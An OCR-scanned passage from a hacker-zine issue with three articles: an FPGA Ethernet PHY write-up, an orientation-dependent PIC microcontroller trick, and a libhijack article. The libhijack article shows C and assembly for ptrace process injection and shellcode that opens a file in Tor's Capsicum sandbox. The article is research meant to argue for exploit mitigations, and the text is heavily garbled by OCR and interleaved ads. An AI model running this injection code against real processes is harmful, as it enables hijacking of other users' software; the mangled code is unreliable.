Once a data frame starts, however, we're going to 
see a J+K control character pair (11000 10001). The 
known position of the zero bits allows us to shift the 
data by a few bits as needed to sync to the 4B/5B 
code groups. 

Decoding the 4B/5B is a simple table lookup 
that outputs 4-bit data words. When the J+K or 
T+R control codes are seen, a status flag is set to 
indicate the start or end of a packet. 

If an invalid 5-bit code is seen, an error counter is 
incremented. Sixteen code errors in a 256-codeword 
window, or four consecutive packet times without 
any inter-frame gap, indicate that we may have lost 
sync with the incoming data or that the cable may 
have been unplugged. In this case, we reset the en- 
tire PHY circuit and attempt to re-negotiate a link. 





The final 4-bit data stream may not be running 
at exactly the same speed as the 25 MHz MII clock, 
due to differences between TX and RX clock do- 
mains. In order to rate match, the 4-bit data com- 
ing off the 4B/5B decoder (excluding idle charac- 
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ters) is fed into an 32-nibble FIFO. When the FIFO 
reaches a fill of 16 nibbles (8 bytes), the PHY be- 
gins to stream the inbound packet out to the MII 
bus. We can thus correct for small clock rate mis- 
matches, up to the point that the FIFO underflows 
or overflows during one packet time. 





Test Results 


In my testing, the TRAGICLASER PHY was able 
to link up with both my laptop and my Cisco switch 
with no issues through an approximately 2-meter 
patch cable. No testing with longer cables was per- 
formed because I didnt have anything longer on 
hand, however since the signal appears to pass the 
802.3 eye mask I expect that the transmitter would 
be able to drive the full 100m cable specified in the 
standard with no difficulties. The receiver would 
likely start to fail with longer cables since I’m not 
doing equalization or adaptive thresholding, how- 
ever I can t begin to guess how much you could get 
actually away with. If anybody decides to try, I'd 
love to hear your results! 


My test bitstream doesn't include a full 10/100 
MAC, so verification of incoming data from the LAN 


was conducted with a logic analyzer on the RX-side 
MII bus. (Figure 14.) 


The transmit-side test sends a single hard-coded 
UDP broadcast packet in a loop. I was able to pick 
it up with Wireshark (Figure 15) and decode it. My 
switch did not report any RX-side CRC errors dur- 
ing a 5-minute test period sending at full line rate. 








In my test with default optimization settings, the 
PHY had a total area of 174 slices, 767 LUT6s, and 
8 LUTRAMS as well as four OSERDES2 and two 
ISERDES2 blocks. This is approximately 1/4 of the 
smallest Spartan-6 FPGA (XC6SLX4) so it should 
be able to comfortably fit into almost any FPGA 
design. Additionally, twelve external resistors and 
an RJ-45 jack with integrated isolation transformer 
were required. 





Further component reductions could be achieved 
if a 1.5 or 1.8V supply rail were available on the 
board, which could be used (along with two exter- 
nal resistors) to inject the DC bias into the coupling 
transformer taps at a savings of two resistors. An 
enterprising engineer may be tempted to use the in- 
ternal 100 ohm differential terminating resistors on 
the FPGA to eliminate yet another passive at the 
cost of two more FPGA pins, however I chose not to 
go this route because I was concerned that dissipat- 
ing 10 mW in the input buffer might overheat the 
FPGA. 


Overall, I was quite surprised at how well the 
PHY worked. Although I certainly hoped to get it 
to the point that it would be able to link up with 
another PHY and send packets, I did not expect the 
TX waveform to be as clean as it was. Although 
the RX likely does not meet the full 802.3 sensi- 
tivity requirements, it is certainly good enough for 
short-range applications. The component cost and 
PCB space used by the external passives compare fa- 
vorably with an external 10/100 PHY if standards 
compliance or long range are not required. 

Source code is available in my Antikernel 
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Internationally recognized, universally consulted. A complete and com- 
prehensive treatment of radio and electronics from simple to advanced 
radio theory and technique. A valuable asset, a constant reference source 
for the bookshelf of every amateur, engineer, experimenter and tech- 
nician. Theory, construction, application—all are covered in this widely 


accepted Handbook—plus a complete catalog section featuring leading 


manufacturers and suppliers of electronic equipment, components and 
tubes, providing an excellent buying guide for purchasing agents as well 
as individual users of parts and equipment. 





$3 USA proper $3.50 US Possessions and Canada 


Buckram Bound Edition $5 Everywhere 


$4 Elsewhere 


The AMERICAN RADIO RELAY LEAGUE, Inc. 


WEST HARTFORD 7, CONN. 


lógit clone https://github.com/azonenberg/antikernel || unzip pocorgtfo17.zip antikernel.zip 
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Figure 14. Receiver Verification 





Frame 42109: 78 bytes on wire (624 bits), 78 bytes captured (624 bits) on interface 0 
w Ethernet II, Sre: ee:ce:ce:ec:ce:ecc fee:ec:ce:ce:ec:ce), Ost Broadcast (TT: TT: ft: TT: TT: FT] 
b Destination: Broadcast (fT: fT: ff: ff: TT: TT) 
b Source: CE: ccicc:ce:ce:ce (cc: cc: ce: ce: ce: cc] 
Type: IPv4 (Ox0800) 
w Internet Pretecel Versien 4, Src: 8.0.0.0 (0.0.0.0), Ost: 255.255. 255.255 [255,755, 255, 25h] 
0100 .... = Version: 4 
.. 0101 = Header Length: 20 bytes (5) 
b Differentiated Services Field: 0x00 (DSCP: CSO, ECN: Not-ECT) 
Total Length: 64 
Identification: 0x0000 (0) 
» Flags: 0x02 (Don't Fragment) 
Fragment offset: 0 
Time to live: 255 
Protocol: UDP (17) 
b Header checksum: Oxcccc [validation disabled] 
Source: 0.0.0.0 (0.0.0.0) 
Destination: 255.255.255.255 (255. 255. 255. 255) 
[Source GeoIP: Unknown] 
[Destination GeoIP: Unknown] 
w User Datagram Protocol, Src Port: 256, Dst Port: 256 
source Port: 256 
Destination Port: 256 
Length: 44 
» Checksum: 0x0000 (none) 
[Stream index: 0] 
w Data (38 bytes) 
Data: O00000000000000000000000000000000000000000000000,... 
[Length: 36] 


Figure 15. Wireshark 
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17:06 The DIP Flip Whixr Trick: 
An Integrated Circuit That Functions in Either Orientation 


Hardware trickery comes in many shapes and 
sizes: implanting add-on hardware into a finished 
product, exfiltrating data through optical, thermal, 
or electromagnetic means, injecting malicious code 
into firmware, BIOS, or microcode, or embedding 
Trojans into physical silicon. Hackers, governments, 
and academics have been playing in this wide open 
field for quite some time and there's no sign of things 
slowing down. 

This PoC, inspired by my friend Whixr of 
#tymkrs, demonstrates the feasibility of an IC be- 
having differently depending on which way it's con- 
nected into the system. Common convention states 
that ICs must be inserted in their specified orien- 
tation, assisted by the notch or key on the device 
identifying pin 1, in order to function properly. 

So, let's defy this convention! 





Most standard chips, like digital logic devices 
and microcontrollers, place the power and ground 
connections at corners diagonal from each other. If 
one were to physically rotate the IC by 180 degrees, 
power from the board would connect to the ground 
pin of the chip or vice versa. This would typically 
result in damage to the chip, releasing the magic 
smoke that it needs to function. The key to this 
PoC was finding an IC with a more favorable pin 
configuration. 

While searching through microcontroller data 
sheets, I came across the Microchip PIC12F629. 
This particular 8-pin device has power and GPIO 
(General Purpose I/O) pins in locations that would 
allow the chip to be rotated with minimal risk. Of 
course, this PoC could be applied to any chip with 
a suitable pin configuration. 








VDD — || 1 8 | |<— Vss 
GPS/T1CKI/OSC1/CLKIN <— l 2 
GP4/T1G/OSC2/CLKOUT «— | 3 


GP3/MCLR/VPP —| | 4 


6 |< > GP1/CIN-/ICSPCLK 


||+—> GPO/CIN+/ICSPDAT 


5 | |-+—> GP2/TOCKI/INT/COUT 
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In the pinout drawing, which shows the chip from 
above in its normal orientation, arrows denote the 
alternate functionality of that particular pin when 
the chip is rotated around. Since power (VDD) is 
normally connected to pin 1 and ground (VSS) is 
normally connected to pin 8, if the chip is rotated, 
GP2 (pin 5) and GP3 (pin 4) would connect to power 
and ground instead. By setting both GP2 and GP3 
to inputs in firmware and connecting them to power 
and ground, respectively, on the board, the PIC will 
be properly powered regardless of orientation. 








I thought it would be fun to change the data 
that the PIC sends to a host PC depending on its 
orientation. 


On power-up of the PIC, GP1 is used to detect 
the orientation of the device and set the mode ac- 
cordingly. If GP1 is high (caused by the pull-up 
resistor to VCC), the PIC will execute the normal 
code. If GP1 is low (caused by the pull-down re- 
sistor to VSS), the PIC will know that it has been 
rotated and will execute the alternate code. ‘This 
orientation detection could also be done using GP5, 
but with inverted polarity. 








The PIC's UART (asynchronous serial) output 
is bit-banged in firmware, so I’m able to reconfigure 
the GPIO pins used for TX and RX (GPO and GP4) 
on-the-fly. The TX and RX pins connect directly to 
an Adafruit FTDI Friend, which is a standard FTDI 
FT232R-based USB-to-serial adapter. The FTDI 
Friend also provides 5V (VDD) to the PoC. 


In normal operation, the device will look for a 
key press on GP4 from the FTDI Friend's TX pin 
and then repeatedly transmit the character ’A’ at 
9600 baud via GPO to the FTDI Friend's RX pin. 
When the device is rotated 180 degrees, the device 
will look for a key press on GPO and repeatedly 
transmit the character 'B' on GP4. As a key press 
detector, instead of reading a full character from the 
host, the device just looks for a high-to-low transi- 
tion on the PIC’s currently configured RX pin. Since 
that pin idles high, the start bit of any data sent 
from the FTDI Friend will be logic low. 








Ul 
PIC12F629-I/P 
Bp = VDD VSS -— A 
R2 10k 2 7 = 
S ssi i NEN GP5 GPO/ICSPDAT 


= RI 10k 


GP4 _ GPIACSPCLK wm 


3 


















GP2 |-——vDD 





si GP3/MCLR 


switch (input(PIN A1)) {// orientation 
detectiom 
case MODE NORMAL: // normal behavior 
#use rs232(baud=9600, bits=8, parity=N, 
stop=l, xmit=PIN AO, force sw) 


// wait for a keypress 
while (input (PIN A4)); 


while(1){ 
printf("A "); 
delay ms(10); 

} 

break; 


case MODE ALTERNATE: // abnormal behavior 
#use rs232(baud=9600, bits=8, parity=N, 
stop=l, xmit=PIN A4, force sw) 


// wait for a keypress 
while(input(PIN A0)); 


while(1)1 
printf("B "); 
delay ms(10); 


j 
break ; 





For your viewing entertainment, a demonstra- 
tion of my breadboard prototype can be found on 
Youtube.!/ Complete engineering documentation, 
including schematic, bill-of-materials, source code, 
and layout for a small circuit board module are also 
available.!* 
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Adafruit FTDI Friend Interface 















PI 
Header 6 
— | RTS <- 
2 RX -> 
3 TX <- 
4 NCC = 
AED; | <— IM CTS > 
Cl 6 





L£ l Di 
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Let this PoC serve as a reminder that one should 
not take anything at face value. There are an end- 
less number of ways that hardware, and the elec- 
tronic components within a hardware system, can 
misbehave. Hopefully, this little trick will inspire 
future hardware mischief and/or the development of 
other sneaky circuits. If nothing else, you're at least 
armed with a snarky response for the next time some 
over-confident engineer insists ICs will only work in 
one direction! 





unzip pocorgtfoi7.pdf dipflip.zip # or at www.grandideastudio.com/portfolio/sneaky-circuits/ 


17:07 Injecting shared objects on FreeBSD with libhijack. 


In the land of red devils known as Beasties exists 
a system devoid of meaningful exploit mitigations. 
As we explore this vast land of opportunity, we will 
meet our ELFish friends, |p|tracing their very moves 
in order to hijack them. Since unprivileged process 
debugging is enabled by default on FreeBSD, we can 
abuse ptrace to create anonymous memory map- 
pings, inject code into them, and overwrite PLT/- 
GOT entries.!? We will revive a tool called libhijack 
to make our nefarious activities of hijacking ELFs 
via ptrace relatively easy. 

Nothing presented here is technically new. How- 
ever, this type of work has not been documented 
in this much detail, so here I am, tying it all into 
one cohesive work. In Phrack 56:7, Silvio Cesare 
taught us fellow ELF research enthusiasts how to 
hook the PLT/GOT.?? Phrack 59:8, on Runtime 
Process Infection, briefly introduces the concept of 
injecting shared objects by injecting shellcode via 
ptrace that calls dlopen().*" No other piece of re- 
search, however, has discovered the joys of forcing 
the application to create anonymous memory map- 
pings from which to inject code. 





This is only part one of a series of planned ar- 
ticles that will follow libhijack's development. The 
end goal is to be able to anonymously inject shared 
objects. The libhijack project is maintained by the 
SoldierX community. 


Previous Research 


All prior work injects code into the stack, the heap, 
or existing executable code. All three methods cre- 
ate issues on today's systems. On AMD64 and 
ARM64, the two architectures libhijack cares about, 
the stack is non-executable by default. The heap 
implementation on FreeBSD, jemalloc creates non- 
executable mappings. Obviously overwriting exist- 
ing executable code destroys a part of the executable 
image. 

PLT/GOT redirection attacks have proven ex- 
tremely useful, so much so that read-only relocations 
(RELRO) is a standard mitigation on hardened sys- 
tems.  Thankfully for us as attackers, FreeBSD 


19?Procedure Linkage Table/Global Offset Table 
20unzip pocorgtfoi7.pdf phrack56-7.txt 
?lunzip pocorgtfo1/.pdf phrack59-8.txt 
22syscall on AMD64, svc 0 on ARM64. 
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doesn't use RELRO, and even if FreeBSD did, us- 
ing ptrace to do devious things negates RELRO as 
ptrace gives us God-like capabilities. We will see 
the strength of PaX NOEXEC in HardenedBSD, 
preventing PLT/GOT redirections and executable 
code injections. 


'The Role of ELF 


FreeBSD provides a nifty API for inspecting the en- 
tire virtual memory space of an application. The 
results returned from the API tells us the protec- 
tion flags of each mapping (readable, writable, exe- 
cutable.) If FreeBSD provides such a rich API, why 
would we need to parse the ELF headers? 


We want to ensure that we find the address of the 
system call instruction in a valid memory location.?? 
On ARM64, we also need to keep the alignment to 
eight bytes. If the execution is redirected to an im- 
properly aligned instruction, the CPU will abort the 
application with SIGBUS or SIGKILL. Intel-based 
architectures do not care about instruction align- 
ment, of course. 


PLT/GOT hijacking requires parsing ELF head- 
ers. One would not be able to find the PLT/GOT 
without iterating through the Process Headers to 
find the Dynamic Headers, eventually ending up 
with the DT. PLTGOT entry. 


We make heavy use of the Struct 0bj Entry 
structure, which is the second PLT/GOT entry. In- 
deed, in a future version of libhijack, we will likely 
handcraft our own Struct O0bj Entry object and 
insert that into the real RTLD in order to allow the 
shared object to resolve symbols via normal meth- 
ods. 


Thus, invoking ELF early on through the pro- 
cess works to our advantage. With FreeBSD's 
libprocstat API, we don't have a need for parsing 
ELF headers until we get to the PLT/GOT stage, 
but doing so early makes it easier for the attacker 
using libhijack, which does all the heavy lifting. 


Finding the Base Address 


Executables come in two flavors: Position- 
Independent Executables (PIEs) and regular ones. 
Since FreeBSD does not have any form of address 
space randomization (ASR or ASLR), it doesn't ship 
any application built in PIE format. 

Because the base address of an application can 
change depending on: architecture, compiler/linker 
flags, and PIE status, libhijack needs to find a way to 
determine the base address of the executable. The 
base address contains the main ELF headers. 

libhijack uses the libprocstat API to find the 
base address. AMD64 loads PIE executables to 
0x01021000 and non-PIE executables to a base ad- 
dress of 0x00200000. ARM64 uses 0x00100000 and 
0x00100000, respectively. 

libhijack will loop through all the memory map- 
pings as returned by the libprocstat API. Only 
the first page of each mapping is read in-enough 
to check for ELF headers. If the ELF headers are 
found, then libhijack assumes that the first ELF ob- 
ject is that of the application. 





l|int resolve base address(HIJACK xhijack ) { 
struct procstat *ps; 

3 struct kinfo proc *p=NULL; 
struct kinfo vmentry *vm=NULL; 

5 unsigned int i, cnt=0; 
int err=ERROR NONE; 

7|  EIfW(Ehdr) xehdr; 





9 ps = procstat open sysctl(); 
if (ps — NULL) { 


11 SetError (hijack , ERROR SYSCALL) ; 
return (—1); 
13 
15 p — procstat getprocs(ps, KERN PROC PID, 
hijack — pid , &cnt); 
17 LP dod ==) 
err = ERROR SYSCALL; 
19 goto error; 
j 
2l 
cnt = 0; 
23| vm = procstat getvmmap(ps, p, &cnt); 
ie (ent 9) 4 
25 err — ERROR SYSCALL; 
goto error; 
27 } 
29 for (i = 0; i < cnt; i++) d 
if (vn[i].kve type != KVME TYPE VNODE) 
31 continue; 
33 ehdr = read data(hijack , 
(unsigned long)(vm[i].kve start), 
35 getpagesize()); 
if (ehdr — NULL) | 
37 goto error; 
} 
39 if (IS _ELF(*xehdr)) { 
hijack—>baseaddr = 
41 (unsigned long)(vm[i].kve start); 
break ; 
43 ) 
free(ehdr); 
45) ] 
47 if (hijack—>baseaddr = NULL) 
err — ERROR NEEDED; 
49 
error: 
51| if (vm != NULL) 
procstat freevmmap(ps, vm); 
53 if (p != NULL) 
procstat freeprocs(ps, p); 
55 procstat close(ps); 
return (err); 
57 
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Assuming that the first ELF object is the appli- 
cation itself, though, can fail in some corner cases, 
such as when the RTLD (the dynamic linker) is used 
to execute the application. For example, instead of 
calling /bin/1s directly, the user may instead call 
/libexec/ld-elf.so.1 /bin/ls. Doing so causes 
libhijack to not find the PLT/GOT and fail early 
sanity checks. This can be worked around by pro- 
viding the base address instead of attempting auto- 
detection. 

The RTLD in FreeBSD only recently gained the 
ability to execute applications directly. Thus, the 
assumption that the first ELF object is the applica- 
tion is generally safe to make. 





Finding the syscall 


As mentioned above, we want to ensure with 100% 
certainty we're calling into the kernel from an ex- 
ecutable memory mapping and in an allowed loca- 
tion. The ELF headers tell us all the publicly acces- 
sible functions loaded by a given ELF object. 

The application itself might never call into the 
kernel directly. Instead, it will rely on shared li- 
braries to do that. For example, reading data from a 
file descriptor is a privileged operation that requires 
help from the kernel. The read() libc function calls 
the read syscall. 

libhijack iterates through the ELF headers, fol- 
lowing this pseudocode algorithm: 





e Locate the first 0bj. Entry structure, a linked 
list that describes loaded shared object. 


e [terate through the symbol table for the 
shared object: 


If the symbol is not a function, continue 
to the next symbol or break out if no 
more symbols. 


Read the symbol's payload into memory. 
Scan it for the syscall opcode, respect- 
ing instruction alignment. 


If the instruction alignment is off, con- 
tinue scanning the function. 


If the syscall opcode is found and the 
instruction alignment requirements are 
met, return the address of the system 
call. 


e Repeat the iteration with the next 0bj. Entry 
linked list node. 
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This algorithm is implemented using a series of 
callbacks, to encourage an internal API that is flex- 
ible and scalable to different situations. 


Creating a new memory mapping 


Now that we found the system call, we can force 
the application to call mmap. AMD64 and ARM64 
have slightly different approaches to calling mmap. 
On AMD64, we simply set the registers, including 
the instruction pointer to their respective values. 
On ARM64, we must wait until the application at- 
tempts to call a system call, then set the registers 
to their respective values. 

Finally, in both cases, we continue execution, 
waiting for mmap to finish. Once it finishes, we 
should have our new mapping. It will store the 
start address of the new memory mapping in rax on 
AMD64 and x0 on ARM64. We save this address, 
restore the registers back to their previous values, 
and return the address back to the user. 

The following is handy dandy table of calling 
conventions. 





Arch Register Value 
AMD64 rax syscall number 
rdi addr 
rsi length 
rdx prot 
r10 flags 
r8 fd (-1) 
r9 offset (0) 
aarch64 x0 syscall number 
xl addr 
x2 length 
x3 prot 
x4 flags 
x5 fd (-1) 
x6 offset (0) 
x8 terminator 
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void freebsd parse soe(HIJACK xhijack , 


struct Struct Obj Entry 


*soe, linkmap callback 


int err=0; 

EIfW (Sym) *libsym=NULL; 

unsigned long numsyms, symaddr=0, i=0; 
char *name; 

numsyms = soe—>nchains; 

symaddr = (unsigned long)(soe—>symtab ) ; 
do{ 


if ((libsym) ) 
free (libsym) ; 


libsym = (EIfW (Sym) 

if (!(libsym)) £ 
err = GetErrorCode(hijack); 
goto notfound; 


} 


if (ELF64 ST TYPE(libsym—>st 


*)read data(hijack , 


info) 


(unsigned long)symaddr, sizeof(EIfW(Sym) )); 


I— STT FUNC) { 


symaddr += sizeof(ElfW(Sym) ); 


continue; 


} 


name = read str(hijack, 
if ((name)) { 
if (callback(hijack , 


soe, 


free(name); 


break; 
} 


free (name); 


} 


symaddr += sizeof(EIfW(Sym)); 
| while (i++ « numsyms) ; 


notfound: 


(unsigned 


name, 
(size t)(libsym—>st size)) 


long)(soe—>strtab + libsym—>st name)); 


((unsigned long)(soe—>mapbase) + libsym—>st value), 
!= CONTPROC) { 


SetError(hijack , err); 
} 
CBRESULT syscall callback (HIJACK *hijack , void *linkmap, char *name, unsigned long vaddr, size t 
unsigned long syscalladdr; 
unsigned int align; 
size t left; 
align = GetInstructionAlignment(); 
left — sz; 
while (left > sizeof(SYSCALLSEARCH) — 1) ( 
syscalladdr = search mem(hijack , vaddr, left , SYSCALLSEARCH, sizeof(SYSCALLSEARCH) —1); 
if (syscalladdr == (unsigned long)NULL) 
break; 
if ((syscalladdr % align) == 0) 4 
hijack—>syscalladdr = syscalladdr; 
return TERMPROC; 
} 
left —— (syscalladdr — vaddr); 
vaddr += (syscalladdr — vaddr) + sizeof (SYSCALLSEARCH) —1; 
j 
return CONTPROC; 
} 


int LocateSystemCall (HIJACK 
Obj Entry *soe, *next; 


xhijack) ( 


if (IsAttached (hijack) false) 


return (SetError(hijack , ERROR NOTATTACHED) ) ; 


if (IsFlagSet (hijack, 
fprintf(stderr, "[x] 


F DEBUG)) 
Looking for 


soe = hijack—>soe; 

do { 
freebsd parse soe(hijack, soe, 
next — TAILQ NEXT(soe , next); 


if (soe !— hijack—>soe) 
free(soe); 
if (hijack—>syscalladdr 
break; 
soe — read data(hijack, 
(unsigned long)next, 
sizeof(*soe)); 
) while (soe !— NULL); 


if (hijack—>syscalladdr (unsigned 
if (IsFlagSet(hijack , F DEBUG) ) 
fprintf(stderr , "[—] Could not 
return (SetError (hijack, 


} 


if (IsFlagSet (hijack , F DEBUG)) 
fprintf(stderr, "[+] syscall 
hijack—>syscalladdr); 


return (SetError( hijack , ERROR NONE) ) ; 


(unsigned 


find 
ERROR NEEDED) ) ; 


syscall\n"); 


syscall callback); 


long ) NULL) 


long)NULL) { 


the syscall\n"); 


found at Ox9?60161x Xn", 
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callback) { 


sz) { 


Currently, fd and offset are hardcoded to —1 
and 0 respectively. The point of libhijack is to use 
anonymous memory mappings. When mmap returns, 
it will place the start address of the new memory 
mapping in rax on AMD64 and x0 on ARM64. The 
implementation of md, map. memory for AMD64 looks 
like the following: 
unsigned long md map memory(HIJACK *hijack, 

struct mmap arg struct *mmap args) { 
REGS regs backup, *regs; 
unsigned long addr, ret; 
register t stackp; 


int err, status; 


ret 
err 


(unsigned long)NULL; 
ERROR NONE; 


regs = _hijack malloc(hijack , sizeof(REGS)); 

if (ptrace(PT GETREGS, 
< 0) { 

err = ERROR SYSCALL; 
goto end; 


hijack — pid , (caddr t)regs, 0) 


memcpy(&regs backup, regs, sizeof(REGS)); 
SetRegister(regs, "syscall", 
SetInstructionPointer(regs, 
SetRegister(regs, "argO" 
SetRegister(regs, "argl" 
SetRegister(regs, "arg2" 
SetRegister(regs, "arg3" 


MMAPSYSCALL) ; 
hijack—>syscalladdr ); 
mmap args—>addr); 

mmap args—>len) ; 

mmap args—>prot) ; 

mmap args—>flags); 

—1)) y fd =/ 

0); /* offset */ 


hijack—>pid, 


SetRegister(regs "arg4" 
SetRegister(regs "arg5" 


if (ptrace(PT SETREGS, 
« 0) 
err — ERROR SYSCALL; 
goto end; i 


(caddr t)regs , 0) 


/* time to rum mmap */ 
addr = MMAPSYSCALL; 
while (addr == MMAPSYSCALL) { 
if (ptrace(PT STEP, hijack—>pid, 
< 0) 
err = ERROR SYSCALL; 
do { i 
waitpid(hijack- pid, 
) while 


(caddr _t)0, 0) 


&status , 
(!WIFSTOPPED (status ) ) ; 


0); 


ptrace(PT GETREGS, 
addr = GetRegister(regs, 
} 


if ((long)addr == —1) { 
if (IsFlagSet (hijack , F DEBUG) ) 
fprintf(stderr, "[—] Could not map address. " 
"Calling mmap failed!\n"); 


hijack—>pid, 
" ret ") ; 


(caddr_t)regs, 0); 


ptrace(PT SETREGS, hijack —>pid, 
(caddr t)(&regs backup), 

err = ERROR CHILDERROR; 

goto end; = 


} 


end: 
if (ptrace(PT SETREGS, hijack—>pid, 
(caddr t)(&regs backup), 
ERROR SYSCALL; 


0); 


0) < 0) 


err — 


if (err 
ret = 


== ERROR NONE) 
addr; 


free(regs); 
SetError (hijack, 
return (ret); 


err); 


} 





Even though we're going to write to the memory 
mapping, the protection level doesn't need to have 
the write flag set. Remember, with ptrace, we're 
gods. It will allow us to write to the memory map- 
ping via ptrace, even if that memory mapping is 
non-writable. 


38 





mics 






Clockwize 


Requires Game 


PROGRAM MILE, 


Z80 / 8088 / 8086 



































Clockwize's order book has expanded so rapidly since 
its formation last year that we urgently require 

Spectrum, IBM and Amstrad Programmers, to work In- 
house and Free-lance. 
If you have experience or feel you are qualified by your 
machine code knowledge to code or convert some of 
1989's top computer games, we would like to hear 

i from you. 
I 
(BRA 


WITH COMPLETE CONFIDENCE PLEASE WRITE IN 
THE FIRST INSTANCE TO:- 


Mr Keith Goodyer 
CLOCKWIZE 
Eastway House 
10 Swanland Avenue 
Bridlington 
North Humberside 
YO15 2HH 
or Telephone (0262) 604892 





HardenedBSD, a derivative of FreeBSD, prevents 
the creation of memory mappings that are both 
writable and executable. If a user attempts to create 
a memory mapping that is both writable and exe- 
cutable, the execute bit will be dropped. Similarly, 
it prevents upgrading a writable memory mapping 
to executable with mprotect, critically, it places 
these same restrictions on ptrace. As a result, lib- 
hijack is completely mitigated in HardenedBSD. 





Hijacking the PLT/GOT 


Now that we have an anonymous memory mapping 
we can inject code into, it's time to look at hijack- 
ing the Procedure Linkage Table/Global Offset Ta- 
ble. PLT/GOT hijacking only works for symbols 
that have been resolved by the RTLD in advance. 
Thus, if the function you want to hijack has not 
been called, its address will not be in the PLT/GOT 
unless BIND. NOW is active. 

The application itself contains its own PLT/- 
GOT. Each shared object it depends on has its own 
PLT/GOT as well. For example, libpcap requires 
libc. libpcap calls functions in libe and thus needs 
its own linkage table to resolve libc functions at run- 





time. 

This is the reason why parsing the ELF headers, 
looking for functions, and for the system call as de- 
tailed above works to our advantage. Along the way, 
we get to know certain pieces of info, like where the 
PLT/GOT is. libhijack will cache that information 
along the way. 

In order to hijack PLT/GOT entries, we need to 
know two pieces of information: the address of the 
table entry we want to hijack and the address to 
point it to. Luckily, libhijack has an API for resolv- 
ing functions and their locations in the PLT/GOT. 

Once we have those two pieces of information, 
then hijacking the GOT entry is simple and straight- 
forward. We just replace the entry in the GOT 
with the new address. Ideally, the the injected code 
would first stash the original address for later use. 





Case Study: Tor Capsicumization 


Capsicum is a capabilities framework for FreeBSD. 
It's commonly used to implement application sand- 
boxing. HardenedBSD is actively working on inte- 
grating Capsicum for Tor. Tor currently supports 
a sandboxing methodology that is wholly incompat- 
ible with Capsicum. Tor's sandboxing model uses 
seccomp (2), a filtering-based sandbox. When Tor 
starts up, Tor tells its sandbox initialization routines 
to whitelist certain resources followed by activation 
of the sandbox. Tor then can call open (2), stat (2), 
etc. as needed on an on-demand basis. 

In order to prevent a full rewrite of Tor to 
handle Capsicum, HardenedBSD has opted to use 
wrappers around privileged function calls, such as 
open(2) and stat(2). ‘Thus, open(2) becomes 
sandbox_open(). 

Prior to entering capabilities mode (capmode 
for short), Tor will pre-open any directories within 
which it expects to open files. Any time Tor ex- 
pects to open a file, it will call tt openat rather 
than open. Thus, Tor is limited to using files within 
the directories it uses. For this reason, we will place 
the shared object within Tor’s data directory. This 
is not unreasonable, since we either must be root or 
running as the same user as the tor daemon in order 
to use libhijack against it. 

Note that as of the time of this writing, the Cap- 
sicum patch to Tor has not landed upstream and is 
in a separate repository.** 

Since FreeBSD does not implement any mean- 





ingful exploit mitigation outside of arguably inef- 
fective stack cookies, an attacker can abuse mem- 
ory corruption vulnerabilities to use ret2libc style 
attacks against wrapper-style capsicumized appli- 
cations with 10096 reliability. Instead of return- 
ing to open, all the attacker needs to do is return 
to sandbox open. Without exploit mitigations like 
PaX ASLR, PaX NOEXEC, and/or CFI, the follow- 
ing code can be used copy/paste style, allowing for 
mass exploitation without payload modification. 

To illustrate the need for ASLR and NOEXEC, 
we will use libhijack to emulate the exploitation 
of a vulnerability that results in à control flow hi- 
jack. Note that due using libhijack, we bypass the 
forward-edge guarantees CFI gives us. LLVM's im- 
plementation of CFI does not include backward-edge 
guarantees. We could gain backward-edge guaran- 
tees through SafeStack; however, Tor immediately 
crashes when compiled with both CFI and SafeS- 
tack. 

In Figure 16, we perform the following: 





e We attach to the victim process. 


e We create an anonymous memory allocation 
with read and execute privileges. 


e We write the filename that we'll pass to 
sandbox open() into the beginning of the al- 
location. 


e We inject the shellcode into the allocation, just 
after the filename. 


e We execute the shellcode and detach from the 
process 





e We call sandbox open. The address is hard- 
coded and can be reused across like systems. 


e We save the return value of sandbox. open, 
which will be the opened file descriptor. 





e We pass the file descriptor to fdopen. The ad- 
dress is hard-coded and can be reused on all 
similar systems. 


e The RTLD loads the shared object, calling any 
initialization routines. In this case, a simple 
string is printed to the console. 


?5nttps://github.com/lattera/tor/tree/hardening/capsicum 
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1|/k main.c. USAGE: a.out «pid» <shellcode> «so» */ 
##define MMAP HINT 0x4000UL 





int main(int argc, char xargv[]) 4 
5 unsigned long addr, ptr; 
HIJACK xctx = InitHijack(F DEFAULT); 
7 AssignPid(ctx, (pid t)atoi(argv[1])); 


9 if (Attach(ctx)) 4 
fprintf(stderr, "[|-| Could not attach!\n") ; 
11 exit (1); 


LocateSystemCall (ctx) ; 
15 addr = MapMemory(ctx , MMAP HINT, getpagesize() , 
PROT READ | PROT EXEC, MAP FIXED | MAP ANON | MAP PRIVATE); 


17 if (addr = (unsigned long)-1) { 
fprintf(stderr, "[-| Could not map memory!\n") ; 
19 Detach (ctx); 


exit (1); 


21) 3 

23 ptr — addr; 

25 WriteData(ctx, addr, argv[3], strlen(argv [3]) +1); 
ptr += strlen(argv[3]) + 1; 

27 InjectShellcodeAndRun(ctx, ptr, argv|[2|, true); 


29 Detach (ctx); 
return (0); 


/* testso.c */ 
_ attribute  ((constructor)) void init(void) { 


printf("This output is from an injected shared object. You have been pwned.\n") ; 


} 








/* sandbox fdlopen.asm */ 20|; Call fdlopen 
2 BITS 64 mov rdi, rax 
mov rbp, rsp 22|mov rsi, 0x101 
4 mov rax, 0x8014c3670 ; fdlopen 
; save registers 24| call rax 
6| push rdi 
: m > 26| ; Restore registers 
push rdx pop rax 
push rcx 28|pop rcx 
10|push rax pop rdx 
30| pop rsi 
12|; Call sandbox open pop rdi 
mov rdi, 0x4000 39 
14|xor rsi, rsi 


mov rsp, rbp 
xor rdx, rdx 34| set 


16|xor rcx, rcx 
mov rax, 0x00000000011c4070 ; sandbox open 
18| call rax 





Figure 16 
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|notice | 


2.1.8— stable, 


04 .976 [notice] 


Tor 0.3.2.2—alpha running on FreeBSD with Libevent 
OpenSSL 1.0.2k—freebsd , 
and Libzstd N/A. 

Tor can’t help you 


Zlib 1.2.11, Liblzma N/A, 


if you use it wrong! Learn how to be safe at 


https: //www.torproject .org/download /download#warning 


.976 This version is 


usual. 


04 [notice | 
Oct 
Oct 
Oct 
Oct 
Oct 
Oct 
Oct 
Oct 
Oct 
Oct 
Oct 


-977 
.982 
.982 
.000 
.000 
.000 
.000 
.000 
.000 
.000 
.000 


04 
04 
04 


[notice | 
[notice | 
| notice | 
[notice | 
[notice | 
[notice | 
[notice | 
[notice | 
[notice | 
[notice | 
[notice | 


Opening Socks 


functionality 
Oct 
This output 


.000 
is from 


[notice | 
an 


not a stable Tor release. 


Read configuration file 
Scheduler type KISTLite has been enabled. 

listener on 127.0.0.1:9050 

Parsing GEOIP IPv4 file /home/shawn/installs /share/tor/geoip. 
